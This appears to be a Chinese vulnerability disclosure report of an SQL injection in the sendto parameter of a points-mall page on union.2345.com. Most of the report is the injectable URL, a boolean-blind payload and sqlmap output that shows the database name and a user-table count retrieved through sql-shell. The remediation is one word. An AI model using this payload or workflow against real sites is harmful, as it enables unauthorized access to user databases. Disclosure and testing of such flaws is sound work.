2345某分站SQL注入漏洞

2345大联盟 union.2345.com 注入点https://union.2345.com/jifen/mall/index.php?category=&priceArea=&sendto=1%27%20and%20%271%27=%271参数sendtoMySQL字符型注入
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: sendtoType: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: category=&priceArea=&sendto=1' AND 5387=5387 AND 'UYEU'='UYEU---[13:17:55] [WARNING] changes made by tampering scripts are not included in shown payload content(s)[13:17:55] [INFO] testing MySQL[13:17:55] [INFO] confirming MySQL[13:17:55] [INFO] the back-end DBMS is MySQLweb application technology: Apache 2.2.22back-end DBMS: MySQL >= 5.0.0[13:17:55] [INFO] fetching current database[13:17:55] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval[13:17:55] [INFO] retrieved: [13:17:55] [WARNING] reflective value(s) found and filtering outunion2345current database: 'union2345'影响联盟注册用户,设计用户资金安全web application technology: Apache 2.2.22back-end DBMS: MySQL >= 5.0.0[13:25:25] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTERsql-shell> select count(*) from all_user[13:25:38] [INFO] fetching SQL SELECT statement query output: 'select count(*) from all_user'[13:25:38] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval[13:25:38] [INFO] retrieved: [13:25:38] [WARNING] reflective value(s) found and filtering out4513select count(*) from all_user: '4513'sql-shell>
解决方案:
过滤